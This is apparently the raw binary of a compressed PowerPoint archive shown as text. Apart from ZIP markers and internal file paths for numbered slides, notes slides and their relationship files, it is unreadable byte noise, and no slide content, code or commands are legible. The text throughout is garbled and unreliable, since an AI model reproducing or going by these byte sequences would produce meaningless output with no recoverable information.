..j..[.^......o.O.v^..}o&.z^.............l.g....$....#....DT..!E.w..0R.E..M...    ..'.gC...U...4..{5....p.........i...Frt.rH..(.K9...Rf.."cy.yD.y,,.....-..U.. ....,.;.FE&...f........\.....|09........sw.Y.F0_i6B_v...h....._.p...dy_p.........rU..UX.*#_.......E.g..L.jN\.G,.........L..3....F...e..].|...l.l.#...@.-....9...........X\.wo...=k.....P.........v.....Z{.. .o..t..{..q....ygw....o.'..w.......8t^..v{.?.v....".....,..QaY.."./h.~.=..8.....2......-.............P....Y....}.G..x.-...1........H...b..~P..<\R... .V.uXB.G........PK..........!.5.F.............ppt/slides/slide13.xml.V.n.6.}.. ..Z..;.b..[.....].....+Ej$....g{.......u......4yyx...=....Td'..F.h.".Dhnr..f..f....y.s...3z......U.9.....c3Zx_e....(.{a*...5.d..C?...PK..$.._2.i..~.~..J.^.^.B...
.<<w..\.V}Ze..L.}..........6V.0...m..V6...V...|Q.Y    Zh.]h.._3...l..X...r~.2.F.3
....M,.{Ox3..gyq{....OX......CCTMD..3...H..I?F..2l}c.{G.A.!.&<~...B...*.?T`.....Y.|t...F...;..B.....,S...A.H..f...........nMI.....W...........WR.+..q.-....Yv.$T..e8..v.a...4........FV.qQ...K...Q.#.:.. 3..IZ..."I..J.I....xL.q:..I..mt1......:..ws..._...T`S/ACL.-h...Q.Bq.k......R.T../.u..q...^`&N...........M!He....Q.4..........#...
.EIEq:...2W.....".@
d.$.?B:"........5....S...<...".PVH.NJ.....4g=...........9.`.......U.Z
.4.U.G].^+..rS........A.;.z.....4../3.s.....'..:...r....s.n..+4..........7L.Io4.]....Io2Z^...&..8.....B........r#.A....}.....u.o.1.E.8a..R\..........|-.T.5.h0}4...........p..`........F..:.[............M-2..b..!..1>.H...[.0j...7;........PK..........!...`.G...t    ......ppt/slides/slide14.xml.V.n.;.}?..`..4M.z.5A....^.$.xu=;...6......o.{|    .si)..Z./3.{........U...|P..yoc.32...\......Y...B[CC...........s.m.21.E...v.,..a.:28.[_..O.....VK.......B...._.....td..$.k#....<.......k.S..J..K# .S..wp3O.Vf........l9.L...3#J....A#V}..a..F...$.....}...[9._.'.DF..d.)oveq~..,^.!.m/....&T5...l.pf*jb.kT......o.3.8....<[....d..,.....T#W.V|....Vd.......K..M....q..".n......Z..%...r.+.+.X(..&.\nh...6..H.....S`.
v.%.}.....*.|,...k<.......],k>.g...zhMD.....
.s.l.q.........{J.....b..."....R7.>(..    ........^.!..CX.".*vt~z........j..Bz....~...U..3C.O..H..i.[E.).(7~+.    ......    .....
y4w..;.........z...oaB..Y1~k.V..T...<hKy.UN.lQ^.............0....w..#y.y.J...U.M}.Q.t...........`.Y....t.{....^..38>.......7?........;..wa..{....M.quR.'L?.N.n...e;....../.2....:...ZC.....4oU. ..hN.F....2.f.......LNseT$......!7..&d..iV..rbml.\e    76.....KDv........PK..........!....}#..........ppt/slides/slide1.xml.W[o.8.}_i....Y..pg...e..U...h..$.D..Y.P....=v..B;.H.t..N..?.....L...&Ur@...%\F*N.b@?M.j}J.e2fBI>..n.........1..4!....<..M....S.s......x..z..#.f....n=c....>F_..i.W.2...F4.."r.......X.570....4Df.D....S..[...:..c...VcM....D..e..r.....bX.....%...:............%...%Q.2.....gd.....z...l.......i..v..........M..`.p../.H.t.*.Q.i~..zL8..{]$...*W.".y....Q...ij./E.}_.J...W.lK..w.AQ.F....~R.^...R.j.h.....N*KpR..C..P...|._.3.
c'v#.........n....sv    .@..2.e.,Dz......rY.4...=.>F.z.8........g...:U.D._.B......&+&.t4j..,......N...ZY..A0.d..l)...rr>3V3.k.&.|.3r.~..?9....Z.0{.D.B..Mk.....hI...."^....$..~..0..1...'...[v0(..j....y.&.t.!..F.8\!.kB.Y.
....^+.:.z:..G..p...>...`O.=.F....m....=nP....G.<.G..`..y)..*!...\@..(....?r.%.>%..t'....9..r..    ...}T.\...v.......pq...o..H    ...f.....    .A.e.......m.....j....<CW|..LoN.....!.1,....w('w.l.5....D...#p.....y.w..,..0]\.!|.5-..S%...&..*p.....];...H..N3.u./.Z......w.k.....n.......S.e.....C.....-....h....N......g..7xS1fW..DGB...~....P.p...A..5..Dpy..6..[yc@I@...!6......ZS..y*S.)...h..J.3.QT...b..A).._i.E^.v....h..?.......PK..........!..,..2....(......ppt/slides/slide7.xml.Z.n.6.._`...E....e.........E;...bo.....I-E;I..}....I.#....$..M..q..<:<.;.z......Se...._.<.D*.\...wW...#..".\
6..X.}y.....F%..v.rD..\.b.....-h.J.L..T....W....7....~..u.4.^._.g..N..}%...    ..(.....</..Zq.j.b%....,..d..g.oY\)...X.U...P....."y.yyD....u...2...2\t...jJtt;U...t........._l.#v.I.n...t.~..t.........y.9.;..q..q.r....S...[....%...4.w.K..jb...|1'...d.!U.s..<....i.h#.p0.J.8.^..rC&q..D......A..X?..\........^......RO..g.*.AG..?.+...Lt..x$....'.B.qFa$./....7%L.\... ..z}W...H...-.ge....s.r....drWj.(.Xb"...^.<..'.A PR-8\:...NP..L
."...l.y.......FP#.(... 6h..P....8.....;..J{l..Z.....9#.x..^.3@.B.<.#.O._|.7B...w.....P1.jYj......:.Y....w.+....w..J.e'...9..hj..aJ...I.....)A...LU^.... 7..g..
..r.f.......ei.T...... .....<c..rq,..:.4\;..
...?...,...=...yk7`......F?..)B..W?.q|...A'..a'L..s....0<?....A....\wiN...^....:ka.d.J.o6..8.go.v7.Z7.,En..G.eX......    ~$...~h|.\}.o|.........6.J.....Y.......]}S.....#.!.s..{u.*MD2...dS...%b.*v..YQ.5MS8Y.=.S........5;.C...)^......m..c.ZoU8..L.....s.Y..........T..p..z.[o.W    f..Di~&!....t..I.Z...b........E.........7...6`IL ...3ls.{.4..X..(Lx.'[....A.'....._..N1....a..(.,P.0..4ad_..K.W.w..~.(s{'.2....z.`
V..&:...R.J.....K......z.......$W...i..y.}.....:.(..8. .#. ..8IzUz.,.H}.H<2.........+_.....7.q8..n..5j@..k<.....L.j......O^W..Y.U.|....L...0.....N|2G.T!.>..G.e.,...g).*}."..../.'/.\!.t~.x5.......l...#....5...5..F...wtv.
....u.m.....#9...P.........X.Falc..."H"W~.n..V.Ku.Q..$......6[]^.......{|}1..T..~)0.z......vT[a......U7e...#..........K2_j......vp...T....I..?@....Y'.N..9!..Q...d...#..ch..M.......q.{..;Y...K.....L5........ ..<....o.'h...^... q..9.k];7.....v&..F.+B..a..... k6..3s.3.nz...h>.kr.0.%..    4.."~...H..g....9..%.;..T.D.).........2..e7...!.#..0.&....Vv....o..    As.....N.....@..c.5...S...Zg..O5.n:>...,.....l.h....a.f...g...G8C.......]J....P..6...b..........~...\`.P..xD......3...A....?...&s....!s......:...X..0...Z.a .39..;.vZvmMs~.~..Q@*......_.    .G....9.....j.i1.1.......v.m<yJ...}D.L+L+"..d..]f...Q.rp/...\....O.....zK.....W...1.>I@4....W.......es.sg......\.....J..    S.%.....4..6.B..
...`.....oZ...c.K).UE    o.H...u....'........PK..........!.T.h......    ......ppt/slides/slide12.xml.V.n.8.}_..@......E.4}iS#N?....Q.TIZ....C.J........2E.s........."..5s.}......2.9.x..p..0........W..\.3.3.......!..v...
._....m.+D....3'..k...Ng...2.....z..(I.V.
2.v.H...}.J.x+.[...MZ.MH. .+.._.;.82.[W...K.o..c*._..Q...>~8..W.3..'...'1.o\...3`c.9....."1.}`.....2.p.V.o.X.......U..).qw..jDw$...&.{.W......O....5..*.5]:g..$2..k...j........C    ..
..v...Vc..x.2._...iY.?M...a....].%fp........i}\q.)......J.@..I..k.jk..)#U.._....%ox.1bj......,>..#......    GA.Z.......I..c..Ty..`<......z.Q4.U8....Q.....y.ymXz&M...3.R..|).2.J.9.v.K..`.....T~.. s&.f...5,...LSE..`.Z.X$1..Zv..yb.;.I..
.3..."..t...<..K...B. .b..Y:.u.( .    .NA..]G..\..<W..1.[kZ........TQZ.U..nq
......T<..<SH`.M1...._..7....l.;Q*.c..(..d..5..R..K.S.a#.+.2b..bM.-...[.a<x^e..e4v.F..s.?.....uI. It<.i..Z.A.....;.\...a....[..`..........?....G....a... .$..J.D...I....{..l..#=K.....HP:"O....N.asM......*I.n?..*M.....~4.J....^.w...Q`1<...^..p+R(..2*.g....b...    16.....w8.I3..b...8:n............PK..........!.j........
......ppt/slides/slide5.xml.V.r.6.}.L...wEw....8J..Lbk,..`.2....."...~K>-_.....DnRG}.@pq.{v.g....$;n.0:..g=J..L..mJ.m..3J.g:g.h...w...._.......v    Ki.}.t..+.b..)......y<..nn.'.*...z..bB......f...i.Jq.k..%.....t-Z.#h...0......,[.<..rc9.+.{m.u.....ne....%.).B....,>j.a....m.......9K......../....=....~7+...f..#....xpwi.....p.m8..%'...jS..oL...m.g.../...`!.._...J0..TcW..|....F......!....M.H... y$.n........
...nMI.......Br.Znh....K..9...F..u.b.]?
.Bc    ....sX..=....pa.G...d./...%..cT.....G...|UV.Yo.......z.....%6.O.a..B.....d.S.B.....T|'O.S.M......!..V0II)|V,...7.G..`.q...j...../}n.i`.P..........J.s.....
......-..Z..Z}.\Q.W...x.)...g................T.E...I.S%..6z..#9W..w..1Y.....m<'...pR..2Y..w..._...z..k)rN.+u......;.4...'..f.@...=..+f=.....g..Q.BC.......P......].F.qg..O;....s1.N;...b8{9].'.?i...D...Q)..S..2h..>].96.."./..;y=.`..:..oYy..}....Z....[@...    .P(..:....U..3...F..Q^..    .....sJ0ry."..c.D!..o.!A]..c.o.pc..V.uX"..........PK..........!.y...7... .......ppt/slides/slide39.xml.V]s.8.}.....?.....p..4m...2    .}...5+K.$.t...G...-.4......q..:{.-%.p..V....$!\1..u7Mn...qB..*.R+>Mv.%og.qf2's...et......u..%u...
.V......usK.........[R....}.}.Z    ..k.......%......F.y.6c...x.........g...pR....1s.?_m....x%D...$..C-....p.~w...D.....3.!6..&..~q.f|.    .^......G....Hw.....h.....p.&......CT.(.........3._...6...sPo
.w.......>F<.y.1m.}@b0.!K"..a:....8M'..{@....O*...W.M...t.........t...$.Z....5~...!.....$$..G..+....ER..g.Z1.....`...Z.W..Zz}P]..f0.0..q..9LP.!..=...%e..2.......#..F..T..#.....?....j...."U.a:...c:4.....i.x.U..4I...Q...K.j...h....k..A..+....6..W..C..L....wh...O
E(qh.O-.....g+.~.....R.`..j.Y......4.3r....../<@.C......a.............:......(g..]."GW..L..^n1f....2&V.6m.E....^..p.x........].1j    ......x1+..<.D[.1........a....}    ~.S.S^..k.|..Q\^..J.
"+.x.......1..:..j.....NW..Y.....Mq.......y...`Q.$.F.]@..y...    ......A3+n..9.Z.K....#.al;..~.|....(+...kj=.    v.0K.@..>..xx:......I._a.......<...;.^o..L.....?.........e...kR...D.............Y...L....;BN.l...c.S2i....&.........
5h......%>D..G......e.-T...k.6.r..@.'..X...&.c.G&../.}.....    \k.E_......`v.......PK..........!.................ppt/slides/slide4.xml.UaO.0..>
...[SNIP]...
}^K5.....E.z.6.2...z...h$..)O...Y/D..-vn..0..b.i...b...-....T..i.......g].....Of..d
.,...%....4..a..jk..+I.w5...=..m.........xO\Y../..........h..Z..;.+%..E7..*s..*...U~*../yraX..N2.....*ad3./..^...%Q.<?..Q.7...F....n......&.W|.m....3a.l...e....g.>..5y...."...=..J8....a....*N........R[.|f&.P    .CR....*    ..=h..s%..AB......_..O..&Pd..k....Q.x.V....x.q.=..*..yf.......*..EO..L..
.....).t
.F'$...=.b...{....v.a...3.#.....n....vw#.Oq...{cn...j&R6.......;..Y"....z.
3..l2UVn...i9.
K..s...K...y...fw..>......1.......aiN..A......u.d*..tr.\-c...l[.....Y..q....S........0.M..? kq^.A.........=....N#.;;....9....N......7......Y.aw.)....
...~{.}h......G...g..L.3W.....T.....r6p%.....`Eq`
.X.^Y^~.u~9.<5.....5..i..
.6..,..Rd.=3..@...O.*...|.2..c.............@.B(Q......<E..S....e.0.[.Y.m.n...6...<.T/....B..Y.......;U|.......Sh.YNf;.T...A..s..F&..fJN.........GY..[.....9..FP^j..pnG.]>....u,.^...(_...f.r.vX....G...`...z..b....hq../._...(_........v.hW.......q..=..v=....Y..x..B..L.$R..k.....5.j.+_b.+...C P_0.a.....0    _g8...N:...XE....v=.....hG....    ....L.g.....K.....:.N.APqUGTw.Ye..K.iyviF.v.%.s......lb.K..=.r<.o].X].$J....&....
$. .*.(.o0u1.U....t3.A..    ........8da.0..r.).r..b$3T`...E?..2..2@.....iL..9.z.0.*.VR..I.`2.../.q.s...#.._Q..e..........t..;G.O51.........OK;......(l...>[..b...4s.j...t........:........*n.T......tz./.p|.....D....Q....b.F8.$.....V.:....gi.4c..%.o.F...r.:...Z!J..s.LA...#...rk.    ....V.....vg..3.....0.\~q.Ike........p...2...q.wn.uK!.W.<>.P.6\
q2.iDC..g..i...j...U..0...[.4...........u...x..q......n........]W..W\#}o..O.5...j.N.!R...5....:~..F
..pO.u.Z.>.......t.....+z@..p...t....kT;..z...-.9*V-f.....k....@0.m..Nj.*..6<w.m..K*...~`Uj....%'.z........_....X..cAu#@k...........PK..........!.Y..a....?.......ppt/slides/slide8.xml.V.n.6.}/. .....l.Y..$X ..q......R.JR...@.../.3..o..i^,........|.....u..y...EL...R......N.1..N.2Z...p..._9(gN......y.{_..]....n..B.,3......Z~.....z.I..RG.}.#.M..D|2IU..k%V(....e.Zm..h+.pP.n.s...%K.....V.Z...-........2....i^.....4b........W.&>.d.8<.3..6...o....Ll<K..d....O.&.......<.3JQ..=.g..s-....U-.q..$.;........u..b&.e....2.T5r.a...w.4..7..tK....6.L9..[%. p....?._qb...........s.?V.......v.qG..[f2.s.........F....[~..n......h.....yP.-..F{P.-.ODnT*,..?....:WY.6.*m>....{... ..j...@e.C;..z.Z.(8.....0$.....S.b...\..J.~.DRY.....e.N......\h&u.*j^.k.
.....z......<.).e.V......P.8$.Mt;.[.}`.T..GX.@t.'.+..Y)..
.P.....`+...g|..b.......pJ.....{x.Z.Z+..hrS]`*4.A,.s^+..1..../.T..5.*4.,./,...^....f...T2...*n.Z.o3.f1..>..N.y...(.....(....#H.^.4Z.....`4.w...~g4.....p..?:=.N?...'...f.8.\.;.........C.?.q.._ ...)eR...L.f...7.....|e..............9&.8r.H|.    .4[..49..].'3.I...%=7.6o.,O.R.Z.fv&@..l?.....M.`.w..V.$.e.k.>j....wJi.!.../&....7!....h0...f.L...9...G.I.h..{..WO".nU...3a
F.....).>w.;..F......1).n.5.Cg...--(..*..ek...7..E..K..lgJ...\k.$e.D....R.kx.4..Y./..j.B~...m....}r&.~.....}..a..a....(!...CD.8 .yC...q.b....3.JZa.H..Lj..1<~=
x.i..?...].......F<.q.    ....j.a.vp.......PK..........!.K.
.............ppt/slides/slide36.xml.W]o.6.}...@.ao.?c.j."s..@....=3..i..H..7...ml...4..t..4/2E]..{.%......d..+.Ji.Y...2.........9%.3.3..O..;.b..w.&q"'X.\.RZxo.n.e...=..+|.h+.......}....A.7.JV*..._.^o6e._...\...r.<<wEi\.f...X...W?pi.......3k.y...O......W..%e..(QL...m>4f.U....g..Z$..6V..X..... ..X....$.'.....>`....Xw....MCTuD_.3h.Y.^p...Um......;.4.....eW..,...MA.........c...w.4..w?.|....o.d.p~...GB.6K.....,T(W.w+J.....q...g...F?...(......h0.......P!4.`S..:.a..q..-.s.<*.,..x.E.-..7F.....~....ge....z.....^../.q_b..d.&I(....l:....P1.:.-...)...T...Ka..R.3..p.....g...R`W.^V0......m5.L.N._6.5.'.....X}+.|P.u.c...Q~{~?p..S.-.T\N.N.[...\..%...@./<....u2.V{.......k)+Uf._=)._K....Z....9...O*.W[&.G.?.J.    .........q.0.O&. ..q.........e..U%o..>....@g...$e..    h\r.....Y.-.*.-2v..3.u...
.Tn.z..../...Yg..O:....s9.N:...r8}9Y...?h.z\.\...r.....AA........K.V*..Ob...+.....}...6..D:...).~..`zo..SJ|.b..7..    ..a1.....y.NS..oJUzN    t.G.R.8.V..t.....7Z....$..@.Q......o.......PK..........!.+.!.....h    ......ppt/slides/slide10.xml.V.n.8.}/..@...e[..!v.M..@......EYl).K......=..n..(..}.)q8.93.....JI..:..,....p.t&.z.}]...#.<U..Z.YTq........Nf...K.,*.7.`.X.K...p..\..z<.. ...^K9...dPR.......:....5..\.....zD.
a\....7c..........-e...YY..Jm?Z.4.[o.n....xED...D.v.5........_w.h..m9..)r#.Y.....C4.;OX........[V|x.z.]..........3..Y    /9...jL).~...#J#..~....v.B...)......Uk.l.xt....`...:.B...._.T:....5 ...p.../i.P.z_.....5F...Zr.^na..O.mB..4vEtN|...n..\k......J.o........!e.".....e..il....Rt.YH.x.e.-.....o.<.y..D.te..^RfE.*.7..vR)|E...q.......d\UP..p.xG.Bi..z....5@=.O.|..z.C.K.TK...L.h.G.....06.E1V.Brw:....#XC..`..2.Y.L....."F....7..7P...    vDV....m..3..C.....~ .Q[.MZ.7D.,....07B...X.....C"..l...xx.=+....{..pi....G.R..N..*.$.8>.V.....,...3IFg.$.H..1.M.X.y.....&..B.N..~.._J.qr.A^.    {..05:.|.Nb..5.-............V>s..0....._...Yo<.N{.Er....O{...j|.~z3...F.....Bt.......6..Tu..............j.1..lf.~..n[w.>9..u..@R.7..L ...F(.W....3..0.V.......*..P....+....Hq|$..t.W.\+.....qS.    ....j.............PK..........!..4......;.......ppt/slides/slide11.xml.W.r"7.}OU.A5.a....[...e......F....H.....9.0.....7.....Z....GW..sI6.:.. ...%.+.3.....l\.%.y.2*...d.].~..OW&u2#..\J...{.V...xN.;m.....9.x..jf........:..
....K...B0.A.u../.X.....J.Wz3.x3.;.....4Ddl*.....r.Fj..5S3....fb...WB...KR.}...G.3..G...'../l>..)b#....o./&...{...l...nO.......r...a..U....4.pf.KN..Q...S?i..#J#..~......B...Y..5@..W;..c...w..r..H..].$.Qo7Z..`.k4...= S......q..g..._u.....3BS...o%.^..M.k. ....sU.:MH&.........E.....V.\aI.......-...........N...    Odb....#O\e.j..'c...).@.J.0,..4k.%kFZy...H..J..[.x..D.
(i.2.4....i...~..9Z.1.]0.D.E.q.F/0.,.>*:G....s..k2...|-...+...JrD."Y1c%..s{..c......+......2j........U....XH...r>..l..$#T.C.>2.E.r.*.X.Ai..G.>]..m..P.{?$hl..8.....,6..u....Bw...h.sg..#..,........,sC....,.....pdE..c....E.....8.@aDR..^C.Y..!u.@~UY.....g...R....<j?6.8.7P..g8...o.._.B(^YZ(a....w.04Q.%.......l....u.V...8.9.Y.st..m;vC..R..H......;h.....&....GY.M?..q<.%.3.w.kH...{..F...4..n..o.*..f..m......q.S.'..R."W..I.......k....~,..?!....(/.....u.I....M.]....z$^....7..M....!B.>9.P.n..0...~...8...$..<!..x.b.(.{...3>+.z.Ek.u...V...0.-.!2;........PK..........!........^.......ppt/slides/slide37.xml.W.n.6....w...b.p..$v..E....&5bw.f$."B..I.gC...^oO.CJJb.............~:<{..$-..B.a.zy..W.N.......F?"..J.....5.........+..ne.l.....f..)..}.s.07.&c........L6.GG'..    .U..S...L......+W.1\2..m*r[[..b-7..L.........._.O.~..?.|..M..^.....H..e...D.,.UX.Ask........Fgl..h5.P..b......|.?...w;....;V7k..........t.u:S.$..}V.R..ou|gIi.../.....1..7....9*...j]9..Q....u........P.F..?.x.(.v...$_.V..9*W<N.4.......}Io.. a.i...%.VQ.6@.x.X.<..j..D...B..f.Br.SR..F7.~<..6wgp..ve..d....k.W.....#...g?D.......Lc.b.j.pC...H@...ga...=l......OO:..5.!..5u!....}.......q...S.....*.A%}..n.......0L/.{u..B..s.j.t    y...O...j....kw3..^'.,......eW..p)Y..]C.;N...B.8..r...w|.-.3.l..........,...q0.-@wdN..F..c.@.L~qfL..-..t.
.........G..=IX.sk......8$.I.....(....3k.k&i...&..".O...E.`0..%....x.....P...=|#....2....O.."F9....a}..........D.)Ku....... .....]...
..................S.-.V.23:..............._%6.....z....Bq.geT.q.=.....).l...stF....)@.."....b#|...k..,u.;.L...o.o.3....... f.V.. ...Fh.....za.........v....i.z..i..8?......y..M..sr.!.....+D.S.~r...=n..=.....=r.......~`X.Hbi.X.n....Z..Ex.. ykX......&B..[.}
e........$.D.P    .    .>E......(|.....i.....].o.%xt.i?..a.dG.......PK..........!.....3...t.......ppt/slides/slide9.xml.X.n.6....w t..M|...HR,NR..!.S`..D[l)J#i'.0`.......II.................\..0V..$...#&tR.R.O.O7..G......B..h%l........U).im..$..+...M2.s{X.B...09w.k....;p.U..n.Z9.:...../f3..."Y.B......4..,m..|
....6...J..,......1B.J/..rZ^......0....i....U...._2,Z...kN||?3..1..6v.........{.....w.....$..A...@.F(Y.,zl..6.F:%X..*.r.}W$_,...$..y..e..l&.e....2.XUt.............tE....7.XY7u+%< P....?._q.P..>M#.J.<F..n..G,W0.....(v$.{...s.`..W.......09x..-tz...+.L.c(.;j......vXcKB.y.J.Dd.J.a..C.~E.s5......-{.&...^..")}.u.xx.......3...."1.w..A.........1yyG.d...%..YR.h..N~.y..e.7..G.....C^].
.gE....2+.`61.t.i....._..    ....g..'...|.)[X.......q6.Z.....s..jqq8?|.-..0
.
.Z.#9.<_m..}n;..;4.1....p..\*......%..0)r..%..m...c..o..3.s].(.........x..%..`h.A..B.;.Pt.........4r)....+...Q.A.@    .[k.S.1]....*._.*......._<.    ......=._.1U2...".E.o6...    -...X#...?.(......A.a<..................p...vt0.\..{.6g...j\.d..v;.......5..:.!.N...7}S.$.GW2y8..j...[.....@..D.....r.8.:..#.zb.d.X.o.D..{4F.F..k....f.V.....,.53c.....m..0.2g.K2"..........\3.a....w3..~..8.|...5..g..Q........~....I.._O.....@........|..VZ.$...
..T...    ......u..).<.
P...6.J.....    ..........;.....z..1..NB.N7....Q'..|J...N.s..&m+-...........%g...j..;...#.g...I...q.W.m....`0.4..;..#8+W.[ ..8..81Q.A.D....V..}..=.....m..xR@.......m..........+}-fa|....1O.......8.....+.3$.!#*........y........<.(....u.9.%cFm..R.f....*..>.E.f}...if....
..c$,P~.gB.<./..........n..P.....n....2.kz#....pv.......BL@,.u.O.......~X..;.+.    S....uO...............A}..9."..(...;E..{^~\z}...........-..I.S..8...4.2-p..Gr.......%Qgg.W,.1|1q..N"-.....H.M...4..(.8Ab..V.8,1z.........PK..........!..<.j........*...ppt/notesSlides/_rels/notesSlide3.xml.rels...j.0.......}v....N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_.VWY0.=....$......f.g................PK..........!..
Yy........+...ppt/notesSlides/_rels/notesSlide37.xml.rels...j.0.......}VR...N/c....}.a+.Yb......P
   .v.I.......g..7g.1.hu.............J
.GS.l......aw..J]..'Q....XJzE.;.L.c.P'}.3......'...y..d@.b..3..n..tI........[._3.r.....W .........m..-.}..?EB,,.$..Jg..\..f...w........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout13.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!...D.........*...ppt/notesSlides/_rels/notesSlide5.xml.rels...j.0.......}vR...N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_.VWY0.=....$......f.g................PK..........!..q..........+...ppt/notesSlides/_rels/notesSlide11.xml.rels...j.0.......}V....N/c.C/.{.a+.ib......P.    .v.I.......2O...........F..`......J
.GS.l......i{..J]..'Q....XJzG.;.L.c.P'}.3.........M..b^2.[1....{..u..z.ov.{o.#...Cyp.e..+.........K..j..X..O......p^.,....k...w7.......PK..........!.J.u9........*...ppt/notesSlides/_rels/notesSlide1.xml.rels...j.0.......}V....N/c.C/.{.a+.ib......P.    .v.I.......2O...........F..`......J
.GS.l......i{..J]..'Q....XJzG.;.L.c.P'}.3.........M..b^2.[1....{..u..z.ov.{o.#...Cyp.e..+.........K..,.c..?=B,,...ye..................PK..........!.~C0Z........*...ppt/notesSlides/_rels/notesSlide4.xml.rels...j.0.......}vR...N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_.VWY0.=....$......f.g................PK..........!....h........*...ppt/notesSlides/_rels/notesSlide8.xml.rels...j.0........v..(.N/c....{.a+.Yb.K....P.    .v.I.......{.....)Zhu...K>.....ew......"Y.....nNo4..%.CfU).-.".h...fd.2.:.S.Qj,...>p .o.'S...VLu.....A]o.^....>8zN.s.(.N....
.2.X....{9.*...G...1    .+.PY.,.l...53..w?.......PK..........!.............*...ppt/notesSlides/_rels/notesSlide7.xml.rels...j.0.......}v.C7F.^...]J...V..D6.6......(....%..C...<.o,..Yhu.
...i.p>.?..bq....-\.a.=>..89.K<...R.-."....#..u.Hu..2;...&;...4.....d@.b.C.P.a..t.........[._3..9ax..+........_....`.{...AI.?.......f....Y..........PK..........!.............*...ppt/notesSlides/_rels/notesSlide2.xml.rels...j.0.......}V....N/c....{.c+.ib.K-...P.    .v.I.......{...
.....E.%..h........Fo............f+u...YUJd..H~Ed7.bY.L.N.T.+5...u';.vM..e..~.T.o..|..x.....4...[r....9.<.O.h.Hb@.[.o..U...G...1    ..e...Y..W..5............PK..........!..f.........*...ppt/notesSlides/_rels/notesSlide9.xml.rels...j.0.......}v.C.F.^...]J...V..D6.6......(....%..C...<.o,..Yhu.
...i.p>.?=.bq....-\.a.=>..89.K<...R.-."....#..u.Hu..2;...&;...4.....d@.b.C.P.a..t.........[._3..9ax..+........_....`.{...AI.?.......f....Y..........PK..........!.#..    ........*...ppt/notesSlides/_rels/notesSlide6.xml.rels...j.0.......}v.C..N/c....{.a+.Yb.K....P
   .v.I.......g..7..)Zhu...K>..........F.S.d.J..n.9...R.x..U.D.0...1.F..u....OeF...&......i..,......-.....\s..7;.}p....LQ..0<.O..e ........U..c..?=b..7d...Y..,B{73..w........PK..........!.X..X........+...ppt/notesSlides/_rels/notesSlide10.xml.rels...j.0.......}v....N/c.C/.{.a+.ib.K....P.    .v.I.......2O..
..-...E.%..`..........)E.p%.]...=..R.x..U.D.0..wc..4#..).I...Rc.LFw....i^MY2.[1..[({..u..z.ov....#....<8ax
.*..@bA.{...mt...X..O.....,TV:.>.Eh...........PK..........!..:.    ........+...ppt/notesSlides/_rels/notesSlide19.xml.rels...j.0.......}v.C.F.^...]J...V..D6.6......(....%..C...<.o,..Yhu.
...i.p>.?=.bq....-\.a.=>..89.K<...R.-."....#..u.Hu..2;...&;...4.....d@.b.C.P.a..t.........[._3..9ax..+........_K...-.."..P.....e....Y..ffV.~.......PK..........!...b.........+...ppt/notesSlides/_rels/notesSlide13.xml.rels...j.0.......}v....N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_K.....}..?E(    ..c...Y..,B{33..w........PK..........!.............+...ppt/notesSlides/_rels/notesSlide30.xml.rels...j.0.......}v....N/.....{.a+.Yb.K....P.    .v.I.......{.....)Zhu...K>............9E.p!.}.{......2.J.la../...hA.)S..!....2....G2].<..f@.a...P...u..z.ov....5..BQn.0<.O..e$.........j...H.."1    ...P....lV..53...?.......PK..........!...s.........+...ppt/notesSlides/_rels/notesSlide29.xml.rels...j.0.......}v....N/c....}.c+.Y".K....P(    .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_......}..?E(    ..c...Y..,..............PK..........!....M........+...ppt/notesSlides/_rels/notesSlide28.xml.rels...j.0.......}V....N/c....}.a+.Yb......P
   .v.I.......g..7g.1.hu.............J
.GS.l......aw..J]..'Q....XJzE.;.L.c.P'}.3......'...y..d@.b..3..n..tI........[._3.r.....W .........m..-.}..?EB,,.$..Jg..\..f...w........PK..........!..U..........+...ppt/notesSlides/_rels/notesSlide27.xml.rels...j.0.......}v...F.^F..]F...V...6.:......(....%..C...2./*.R.....E.|.......    ..F.s.d.B....n.N3J].)dV....$._.a7...S.X'C*.J.e4..'.d..y4e..~.TGo..}..t.....4...kr....8ax..*..HbA.k...{....m..?Eb..7d...Y...B.kf6........PK..........!.QW..........+...ppt/notesSlides/_rels/notesSlide31.xml.rels...j.0.......}v....N/c....{.a+.i"..-...P.    .v.I.......{.......Z.."v...,|...^@IA.8E&.W..w...O...%.C.U),..R..1.F.QtL.u..<c.1.&.;.@f.4.&/......-....:^S..7;.}p...y&.wN....
.<P....#....j...H.."....J...Y..,B.kfV.~.......PK..........!...B.........+...ppt/notesSlides/_rels/notesSlide32.xml.rels...j.0.......}V..1F.^...^F...V..D6.7......(....%..C..y..7e    ....E...<..<.?...b..)2........~.dK].1$Q..b`,%."..i..c"..>...........7M..y..n.T{o .................f.r....<U.....Z_;r-.O.....i.S.c!9X).W:..."..f..{........PK..........!.e...........+...ppt/notesSlides/_rels/notesSlide33.xml.rels...j.0.......}v.A..N/c....{.c+.i".K-...P.    .v.I.......{.....D.Z..B.)D.,|...^@.8
nJ........v.89.K<...R.-."....#..u.Hu..2;...&;r..M.lMY2.[1.!X(...u..z.ov....-...$wN..b.
